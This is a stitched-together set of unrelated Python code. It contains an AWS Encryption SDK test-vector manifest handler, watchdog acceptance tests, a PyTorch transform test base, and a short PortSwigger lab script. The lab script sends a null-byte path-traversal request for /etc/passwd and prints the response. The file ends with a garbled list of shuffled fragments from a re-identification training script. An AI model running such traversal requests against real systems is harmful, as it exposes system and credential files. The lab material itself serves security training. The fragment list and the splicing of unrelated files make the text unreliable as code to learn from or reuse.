                master_key_provider_fn=self.decryption_master_key_provider_fn,
                decryption_method=self.decryption_method,
                result=expected_result,
            ),
        )


@attr.s
class MessageDecryptionGenerationManifest(object):
    """AWS Encryption SDK Decryption Message Generation manifest handler.

    Described in AWS Crypto Tools Test Vector Framework feature #0006 AWS Encryption SDK Decrypt Message Generation.

    :param int version: Version of this manifest
    :param KeysManifest keys: Loaded keys
    :param dict plaintexts: Mapping of plaintext names to plaintext values
    :param dict tests: Mapping of test scenario names to :class:`MessageDecryptionTestScenarioGenerator`s
    """

    version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS))
    keys = attr.ib(validator=attr.validators.instance_of(KeysManifest))
    plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type))
    tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator))
    type_name = "awses-decrypt-generate"

    @staticmethod
    def _generate_plaintexts(plaintexts_specs):
        # type: (PLAINTEXTS_SPEC) -> Dict[str, bytes]
        """
        Generate required plaintext values.

        :param dict plaintexts_specs: Mapping of plaintext name to size in bytes
        :return: Mapping of plaintext name to randomly generated bytes
        :rtype: dict
        """
        return {name: os.urandom(size) for name, size in plaintexts_specs.items()}

    @classmethod
    def from_file(cls, input_file):
        # type: (IO) -> MessageDecryptionGenerationManifest
        """
        Load from a file containing a full message decrypt generation manifest.

        :param file input_file: File object for file containing JSON manifest
        :return: Loaded manifest
        :rtype: MessageDecryptionGenerationManifest
        """
        raw_manifest = json.load(input_file)
        validate_manifest_type(
            type_name=cls.type_name, manifest_version=raw_manifest["manifest"], supported_versions=SUPPORTED_VERSIONS
        )

        parent_dir = os.path.abspath(os.path.dirname(input_file.name))
        reader = file_reader(parent_dir)
        raw_keys_manifest = json.loads(reader(raw_manifest["keys"]).decode(ENCODING))
        keys = KeysManifest.from_manifest_spec(raw_keys_manifest)
        plaintexts = cls._generate_plaintexts(raw_manifest["plaintexts"])

        tests = {}
        for name, scenario in raw_manifest["tests"].items():
            try:
                tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario(
                    scenario=scenario, keys=keys, plaintexts=plaintexts
                )
            except NotImplementedError:
                continue

        return cls(version=raw_manifest["manifest"]["version"], keys=keys, plaintexts=plaintexts, tests=tests)

    def run_and_write_to_dir(self, target_directory, json_indent=None):
        # type: (str, Optional[int]) -> None
        """
        Process all known encrypt test scenarios and write the resulting data and manifests to disk.

        :param str target_directory: Directory in which to write all output
        :param int json_indent: Number of spaces to indent JSON files (optional: default is to write minified)
        """
        root_dir = os.path.abspath(target_directory)
        root_writer = file_writer(root_dir)

        root_writer("keys.json", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING))

        plaintext_writer = file_writer(os.path.join(root_dir, "plaintexts"))
        plaintext_uris = {name: plaintext_writer(name, plaintext) for name, plaintext in self.plaintexts.items()}

        ciphertext_writer = file_writer(os.path.join(root_dir, "ciphertexts"))

        test_scenarios = {
            decrypt_scenario_name: decrypt_scenario
            for scenario in self.tests.values()
            for decrypt_scenario_name, decrypt_scenario in scenario.run(
                ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name]
            ).items()
        }

        decrypt_manifest = MessageDecryptionManifest(
            keys_uri="file://keys.json", keys=self.keys, test_scenarios=test_scenarios
        )
        root_writer("manifest.json", json.dumps(decrypt_manifest.manifest_spec, indent=json_indent).encode(ENCODING))
from acceptance.harness.acceptance_test import WatchdogAcceptanceTest


class TestStartStopFeature(WatchdogAcceptanceTest):
    def test_willStartObserverWhenWatchdogStarted(self):
        self.create_and_start_watchdog()

        self.assertTrue(self.fs_observer.running)

    def test_willStopObserverWhenWatchdogStopped(self):
        self.create_and_start_watchdog()
        self.watchdog.stop()

        self.assertFalse(self.fs_observer.running)

    def test_willJoinObserverThreadWhenWatchdogStopped(self):
        self.create_and_start_watchdog()
        self.watchdog.stop()

        self.assertTrue(self.fs_observer.joined)
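# --- Illustration (not the project's actual harness) ---
# The tests above assume WatchdogAcceptanceTest wires a watchdog to a fake
# filesystem observer exposing `running` and `joined` flags. A minimal,
# self-contained sketch of what such a harness might look like; every name
# below is an assumption for illustration only.
import unittest


class FakeObserver(object):
    """Records the lifecycle calls the tests assert on."""

    def __init__(self):
        self.running = False
        self.joined = False

    def start(self):
        self.running = True

    def stop(self):
        self.running = False

    def join(self):
        self.joined = True


class SketchWatchdog(object):
    """Hypothetical watchdog that owns its observer's lifecycle."""

    def __init__(self, observer):
        self._observer = observer

    def start(self):
        self._observer.start()

    def stop(self):
        # Stopping the watchdog stops the observer and joins its thread.
        self._observer.stop()
        self._observer.join()


class SketchWatchdogAcceptanceTest(unittest.TestCase):
    def create_and_start_watchdog(self):
        self.fs_observer = FakeObserver()
        self.watchdog = SketchWatchdog(self.fs_observer)
        self.watchdog.start()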
import torch
import torchtestcase

from neural_spline_flows.nde.transforms import base


class TransformTest(torchtestcase.TorchTestCase):
    """Base test for all transforms."""

    def assert_tensor_is_good(self, tensor, shape=None):
        self.assertIsInstance(tensor, torch.Tensor)
        self.assertFalse(torch.isnan(tensor).any())
        self.assertFalse(torch.isinf(tensor).any())
        if shape is not None:
            self.assertEqual(tensor.shape, torch.Size(shape))

    def assert_forward_inverse_are_consistent(self, transform, inputs):
        inverse = base.InverseTransform(transform)
        identity = base.CompositeTransform([inverse, transform])
        outputs, logabsdet = identity(inputs)
        self.assert_tensor_is_good(outputs, shape=inputs.shape)
        self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1])
        self.assertEqual(outputs, inputs)
        self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1]))

    def assertNotEqual(self, first, second, msg=None):
        if (self._eps and (first - second).abs().max().item() < self._eps) or (
            not self._eps and torch.equal(first, second)
        ):
            self._fail_with_message(msg, "The tensors are _not_ different!")
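# --- Illustration (stand-in transform; not part of the package) ---
# How the TransformTest helpers above are typically used: subclass it and run
# the assertions on a concrete transform's outputs. The scale-by-2 "transform"
# and its expected logabsdet (dim * ln 2 per sample) are assumptions made for
# this sketch, not code from neural_spline_flows.
import math

import torch


class ExampleTransformTest(TransformTest):
    def test_scaling_outputs_are_well_formed(self):
        batch, dim = 4, 3
        inputs = torch.randn(batch, dim)
        outputs = inputs * 2.0  # elementwise scaling by 2
        # log|det J| of scaling by 2 in `dim` dimensions is dim * ln 2 per sample
        logabsdet = torch.full((batch,), dim * math.log(2.0))
        self.assert_tensor_is_good(outputs, shape=[batch, dim])
        self.assert_tensor_is_good(logabsdet, shape=[batch])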
<filename>directory-traversal/validate-file-extension-null-byte-bypass.py
"""
https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass
"""
import sys

import requests

site = sys.argv[1]
if 'https://' in site:
    # strip the scheme and any trailing slash; str.lstrip('https://') would
    # also eat leading host characters from the set {h, t, p, s, :, /}
    site = site[len('https://'):].rstrip('/')

url = f'''https://{site}/image?filename=../../../etc/passwd%00.png'''
s = requests.Session()
resp = s.get(url)
print(resp.text)
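# --- Usage note (the lab hostname below is a placeholder) ---
# Example:
#   python3 validate-file-extension-null-byte-bypass.py https://YOUR-LAB-ID.web-security-academy.net/
# The %00.png suffix targets extension checks that validate the string after
# the null byte while the underlying file API stops reading at the null.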
[ "logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个 cudnn.benchmark = True cudnn.enabled =", "# @Software: PyCharm # @Desc : from my_reid.eug import *", "u_data iter_mode = 2 #迭代模式,确定是否训练tagper for step in range(total_step): #", "t_label_pre,t_select_pre = 0,0 raw_select_pre_t = 0 # label_pre_t,select_pre_t=0,0 if iter_mode==2:", "ckpt_file = -1, '' if args.resume: resume_step, ckpt_file = resume(save_path)", "import Path def resume(savepath): import re pattern = re.compile(r'step_(\\d+)\\.ckpt') start_step", "@File : atmpro1_vsm2.py # @Software: PyCharm # @Desc : #!/usr/bin/python3.6", "init=args.init) resume_step, ckpt_file = -1, '' if args.resume: resume_step, ckpt_file", "{:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step, label_pre, select_pre))", "max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) new_train_data = l_data unselected_data = u_data", "20) config_file.close() train_time_file = open(osp.join(save_path, 'time.txt'), 'a') # 只记录训练所需要的时间. #", "need resume if start_step >= 0: print(\"continued from iter step\",", "the labeled and unlabeled data for training dataset_all = datasets.create(args.dataset,", "#!/usr/bin/python3.6 # -*- coding: utf-8 -*- # @Time : 2020/9/3", "# @File : atmpro1_vsm.py # @Software: PyCharm # @Desc :", "Joselynzhao # @Email : <EMAIL> # @File : atmpro1.py #", "from my_reid.utils.logging import Logger import os.path as osp import sys", "#mode = 1 # raw_select_pre = raw_select_pre_t # raw_select_pre_t =", "config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path) print('save_path='+save_path) print('-' * 20 + 'config_info' +", "re.compile(r'step_(\\d+)\\.ckpt') start_step = -1 ckpt_file = \"\" # find start", "mAP, rank1, rank5, rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx =", "<EMAIL> # @File : atmpro1_vsm2.py # @Software: PyCharm # @Desc", "# 只对eug进行性能评估 # mAP, rank1, rank5, rank10, rank20 = 0,", "raw_select_pre_t = raw_select_pre print(\"training tagper model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select,", "default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss']) parser.add_argument('--init', type=float, default=-1) parser.add_argument('-m', '--momentum', type=float, default=0.5)", "print(\"training tagper model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data))) _, _,", "my_reid import datasets from my_reid import models import numpy as", "= Path('/mnt/') if father.exists(): # 是在服务器上 data_dir = Path('/mnt/share/datasets/RE-ID/data') #", "import Logger import os.path as osp import sys from torch.backends", "from pathlib import Path def resume(savepath): import re pattern =", "my_reid import models import numpy as np import torch import", "open(osp.join(save_path, 'dataf.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. 
data_file = open(osp.join(save_path, 'data.txt'),", "time.time() step_time = end_time - start_time total_time = step_time +", "l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper = EUG(batch_size=args.batch_size,", "# 本地跑用这个 cudnn.benchmark = True cudnn.enabled = True save_path =", "100 // args.EF + 1 sys.stdout = Logger(osp.join(save_path, 'log' +", "ratio, save_path)) # train the model or load ckpt start_time", ": Joselynzhao # @Email : <EMAIL> # @File : atmpro1_vsm2.py", "# raw_select_pre_t = 0 label_pre,select_pre = raw_label_pre,raw_select_pre end_time = time.time()", "'--fea', type=int, default=1024) parser.add_argument('--EF', type=int, default=10) parser.add_argument('--t', type=float, default=2) #不再tagper采样的倍率,", "# @Author : Joselynzhao # @Email : <EMAIL> # @File", "= True cudnn.enabled = True save_path = os.path.join(logs_dir, args.dataset, args.exp_name,", "1 sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\") +", "'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. kf_file = open(osp.join(save_path,'kf.txt'),'a') # 数据格式为", "-*- # @Time : 2020/9/1 下午7:07 # @Author : Joselynzhao", "raw_select_pre print(\"training tagper model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data))) _,", "files: try: iter_ = int(pattern.search(filename).groups()[0]) print(iter_) if iter_ > start_step:", "<EMAIL> # @File : atmpro1.py # @Software: PyCharm # @Desc", "{:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step, label_pre,", "cudnn.enabled = True save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) #", "2020/9/1 下午7:07 # @Author : Joselynzhao # @Email : <EMAIL>", "rank1, rank5, rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx = eug.select_top_data_vsm2(pred_score,", "= eug.generate_new_train_data(selected_idx, pred_y) # kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre, select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step)", "nums_to_select_tagper >=len(u_data): iter_mode=1 #切换模式 print('tagper is stop') else: #mode =", ">= len(u_data): break #args.vsm_lambda的衰减 0.5 - 0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2))", "= open(osp.join(save_path, 'config.txt'), 'w') config_info = str(args).split('(')[1].strip(')').split(',') config_info.sort() for one", "ckpt_file = \"\" # find start step files = os.listdir(savepath)", "coding: utf-8 -*- # @Time : 2020/9/3 上午11:03 # @Author", "rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if", "re-ID') parser.add_argument('-d', '--dataset', type=str, default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16)", "= open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. kf_file = open(osp.join(save_path,'kf.txt'),'a')", "@Desc : from my_reid.eug import * from my_reid import datasets", "osp.join(save_path,'tagper') #tagper存储路径. 
if not Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20)", "import numpy as np import torch import argparse import os", "True cudnn.enabled = True save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order)", "raw_label_pre, raw_select_pre = label_pre,select_pre t_label_pre,t_select_pre = 0,0 raw_select_pre_t = 0", "@File : atmpro1.py # @Software: PyCharm # @Desc : from", "step files = os.listdir(savepath) files.sort() for filename in files: try:", "warnings warnings.filterwarnings(\"ignore\") from my_reid.utils.logging import Logger import os.path as osp", "> start_step: start_step = iter_ ckpt_file = osp.join(savepath, filename) except:", "0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%, step", "label_pre,select_pre = t_label_pre,t_select_pre if nums_to_select_tagper >=len(u_data): iter_mode=1 #切换模式 print('tagper is", "0 mAP, rank1, rank5, rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery) #", "{:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close() train_time_file.close() if __name__ == '__main__': parser", "{:.6} {:.6}\\n'.format(step, step_time, total_time)) kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%}", "l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) new_train_data = l_data", "nums_to_select = int(len(u_data) * ratio) nums_to_select_tagper = int(len(u_data) * ratio_t)", "本地跑用这个 cudnn.benchmark = True cudnn.enabled = True save_path = os.path.join(logs_dir,", "@Software: PyCharm # @Desc : from my_reid.eug import * from", "files) return start_step, ckpt_file def main(args): father = Path('/mnt/') if", "cudnn.benchmark = True cudnn.enabled = True save_path = os.path.join(logs_dir, args.dataset,", "select_pre_t ,加上了了tagper的数据. tagper_path = osp.join(save_path,'tagper') #tagper存储路径. if not Path(tagper_path).exists(): os.mkdir(tagper_path)", "end_time - start_time total_time = step_time + total_time train_time_file.write('{} {:.6}", "#迭代模式,确定是否训练tagper for step in range(total_step): # for resume if step", "args.dataset)) num_all_examples = len(dataset_all.train) l_data, u_data = get_init_shot_in_cam1(dataset_all, load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name, args.init),", ": <EMAIL> # @File : atmpro1_vsm.py # @Software: PyCharm #", "iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. 
-50个样本,保证unselected_data数量不为0 new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y)", "'--momentum', type=float, default=0.5) parser.add_argument('-e', '--epochs', type=int, default=70) parser.add_argument('-s', '--step_size', type=int,", "from iter step\", start_step) else: print(\"resume failed\", start_step, files) return", "momentum=args.momentum, lamda=args.lamda) new_train_data = l_data unselected_data = u_data iter_mode =", "eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) if step !=", "0, 0 mAP, rank1, rank5, rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery)", "if step != resume_step else eug.resume(ckpt_file, step) # 只对eug进行性能评估 #", "rank1, rank5, rank10, rank20 = 0, 0, 0, 0, 0", "num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) new_train_data", "Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path, 'config.txt'),", "config_info: key,value=map(str,one.split('=')) config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path) print('save_path='+save_path) print('-' * 20 +", "# 数据格式为 step_time total_time. total_time = 0 # get all", "args.EF / 100 ratio_t = (step+1+args.t) * args.EF /100 nums_to_select", "else: #mode = 1 # raw_select_pre = raw_select_pre_t # raw_select_pre_t", ": <EMAIL> # @File : atmpro1.py # @Software: PyCharm #", "torch.backends import cudnn from my_reid.utils.serialization import load_checkpoint from torch import", "import models import numpy as np import torch import argparse", "default=0.5) parser.add_argument('-e', '--epochs', type=int, default=70) parser.add_argument('-s', '--step_size', type=int, default=55) parser.add_argument('--lamda',", "'__main__': parser = argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID') parser.add_argument('-d', '--dataset',", "= open(osp.join(save_path,'kf.txt'),'a') # 数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据. 
tagper_path =", "get all the labeled and unlabeled data for training dataset_all", "# @Email : <EMAIL> # @File : atmpro1_vsm2.py # @Software:", "not Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path,", "args.resume: resume_step, ckpt_file = resume(save_path) # initial the EUG algorithm", "raw_select_pre = raw_select_pre_t # raw_select_pre_t = 0 label_pre,select_pre = raw_label_pre,raw_select_pre", "step, nums_to_select, ratio, save_path)) # train the model or load", "print('tagper is stop') else: #mode = 1 # raw_select_pre =", "default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16) parser.add_argument('-f', '--fea', type=int, default=1024)", "# -*- coding: utf-8 -*- # @Time : 2020/9/1 下午7:07", "vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%, step {}:\\t", "parser = argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID') parser.add_argument('-d', '--dataset', type=str,", "eug.generate_new_train_data(selected_idx, pred_y) raw_label_pre, raw_select_pre = label_pre,select_pre t_label_pre,t_select_pre = 0,0 raw_select_pre_t", "= iter_ ckpt_file = osp.join(savepath, filename) except: continue # if", "logs_dir = Path('/mnt/home/{}'.format(args.log_name)) # 服务器 else: #本地 data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data')", "args.EF, step, nums_to_select, ratio, save_path)) # train the model or", "step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) pred_y, pred_score, label_pre,dists= tagper.estimate_label_vsm() selected_idx", "= time.time() step_time = end_time - start_time total_time = step_time", "torch.nn.parallel import DistributedDataParallel as DDP from torch.utils.data.distributed import DistributedSampler from", "max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data,", "print(\"training reid model\") eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1)", "type=int, default=16) parser.add_argument('-f', '--fea', type=int, default=1024) parser.add_argument('--EF', type=int, default=10) parser.add_argument('--t',", "- 0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%,", "# get all the labeled and unlabeled data for training", "+ 1 sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\")", "embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data,", "total_time)) kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write(", "atmpro1.py # @Software: PyCharm # @Desc : from my_reid.eug import", "只记录训练所需要的时间. # 数据格式为 step_time total_time. 
total_time = 0 # get", "time.strftime(\".%m_%d_%H:%M:%S\") + '.txt')) dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a') # 保存性能数据.", "step in range(total_step): # for resume if step < resume_step:", "is stop') else: #mode = 1 # raw_select_pre = raw_select_pre_t", "rank5, rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50)", "dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper =", "= EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum,", "atmpro1_vsm.py # @Software: PyCharm # @Desc : #!/usr/bin/python3.6 # -*-", "ratio_t) if nums_to_select >= len(u_data): break #args.vsm_lambda的衰减 0.5 - 0", "= argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID') parser.add_argument('-d', '--dataset', type=str, default='mars',", "total_time = step_time + total_time train_time_file.write('{} {:.6} {:.6}\\n'.format(step, step_time, total_time))", "select_pre)) dataf_file.close() train_time_file.close() if __name__ == '__main__': parser = argparse.ArgumentParser(description='Progressive", "parser.add_argument('-d', '--dataset', type=str, default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16) parser.add_argument('-f',", "utf-8 -*- # @Time : 2020/9/3 上午11:03 # @Author :", "in range(total_step): # for resume if step < resume_step: continue", "- start_time total_time = step_time + total_time train_time_file.write('{} {:.6} {:.6}\\n'.format(step,", "(step + 1) * args.EF / 100 ratio_t = (step+1+args.t)", "{:.6}\\n'.format(step, step_time, total_time)) kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%} {:.2%}", "ckpt_file = osp.join(savepath, filename) except: continue # if need resume", "if iter_ > start_step: start_step = iter_ ckpt_file = osp.join(savepath,", "dist from torch.nn.parallel import DistributedDataParallel as DDP from torch.utils.data.distributed import", "数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据. tagper_path = osp.join(save_path,'tagper') #tagper存储路径. if", "if iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. 
-50个样本,保证unselected_data数量不为0 new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx,", "iter_mode==2: raw_select_pre_t = raw_select_pre print(\"training tagper model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,", "{}\".format( args.EF, step, nums_to_select, ratio, save_path)) # train the model", "= 0,0 raw_select_pre_t = 0 # label_pre_t,select_pre_t=0,0 if iter_mode==2: raw_select_pre_t", "# @File : atmpro1.py # @Software: PyCharm # @Desc :", "DistributedSampler from pathlib import Path def resume(savepath): import re pattern", "+=1 print(\"Runing: EF={}%, step {}:\\t Nums_to_be_select {} \\t Ritio \\t", "if father.exists(): # 是在服务器上 data_dir = Path('/mnt/share/datasets/RE-ID/data') # 服务器 logs_dir", "step != resume_step else eug.resume(ckpt_file, step) # 只对eug进行性能评估 # mAP,", "num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper", "#!/usr/bin/python3.6 # -*- coding: utf-8 -*- # @Time : 2020/9/1", "Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\") + '.txt')) dataf_file =", "# initial the EUG algorithm eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all,", "atmpro1_vsm2.py # @Software: PyCharm # @Desc : #!/usr/bin/python3.6 # -*-", "init_lr=0.1) if step != resume_step else eug.resume(ckpt_file, step) # 只对eug进行性能评估", "ratio = (step + 1) * args.EF / 100 ratio_t", "= Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个 cudnn.benchmark = True cudnn.enabled = True", "# train the model or load ckpt start_time = time.time()", "= os.listdir(savepath) files.sort() for filename in files: try: iter_ =", "= open(osp.join(save_path, 'dataf.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. data_file = open(osp.join(save_path,", "* ratio) nums_to_select_tagper = int(len(u_data) * ratio_t) if nums_to_select >=", "kf_file = open(osp.join(save_path,'kf.txt'),'a') # 数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据. tagper_path", "if start_step >= 0: print(\"continued from iter step\", start_step) else:", "args.exp_order) # 到编号位置. total_step = 100 // args.EF + 1", "{:.2%} {:.2%}'.format(step, label_pre, select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step) tagper.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs,", "// args.EF + 1 sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF)", "Path def resume(savepath): import re pattern = re.compile(r'step_(\\d+)\\.ckpt') start_step =", "#切换模式 print('tagper is stop') else: #mode = 1 # raw_select_pre", "import * from my_reid import datasets from my_reid import models", "start_step, ckpt_file def main(args): father = Path('/mnt/') if father.exists(): #", "= resume(save_path) # initial the EUG algorithm eug = EUG(batch_size=args.batch_size,", "else min(nums_to_select,len(u_data))) #直接翻两倍取数据. 
-50个样本,保证unselected_data数量不为0 new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y) raw_label_pre,", "choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16) parser.add_argument('-f', '--fea', type=int, default=1024) parser.add_argument('--EF',", "else eug.resume(ckpt_file, step) # 只对eug进行性能评估 # mAP, rank1, rank5, rank10,", "= EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum,", "train_time_file.write('{} {:.6} {:.6}\\n'.format(step, step_time, total_time)) kf_file.write('{} {} {} {:.2%} {:.2%}", "eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0 new_train_data, unselected_data,", "ckpt start_time = time.time() print(\"training reid model\") eug.train(new_train_data, unselected_data, step,", "datasets.create(args.dataset, osp.join(data_dir, args.dataset)) num_all_examples = len(dataset_all.train) l_data, u_data = get_init_shot_in_cam1(dataset_all,", "dataset_all.gallery) # 把数据写到data文件里. data_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step, mAP,", "l_data unselected_data = u_data iter_mode = 2 #迭代模式,确定是否训练tagper for step", "Joselynzhao # @Email : <EMAIL> # @File : atmpro1_vsm2.py #", "parser.add_argument('--t', type=float, default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样. parser.add_argument('--exp_order', type=str, default='0') parser.add_argument('--exp_name', type=str,", "{:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close()", "from torch.nn.parallel import DistributedDataParallel as DDP from torch.utils.data.distributed import DistributedSampler", "unselected_data = u_data iter_mode = 2 #迭代模式,确定是否训练tagper for step in", "data_file = open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. kf_file =", "和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path, 'config.txt'), 'w') config_info = str(args).split('(')[1].strip(')').split(',')", "total_time = 0 # get all the labeled and unlabeled", "as osp import sys from torch.backends import cudnn from my_reid.utils.serialization", "parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume', type=str, default='Yes') parser.add_argument('--max_frames', type=int, default=900) parser.add_argument('--loss',", "EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, 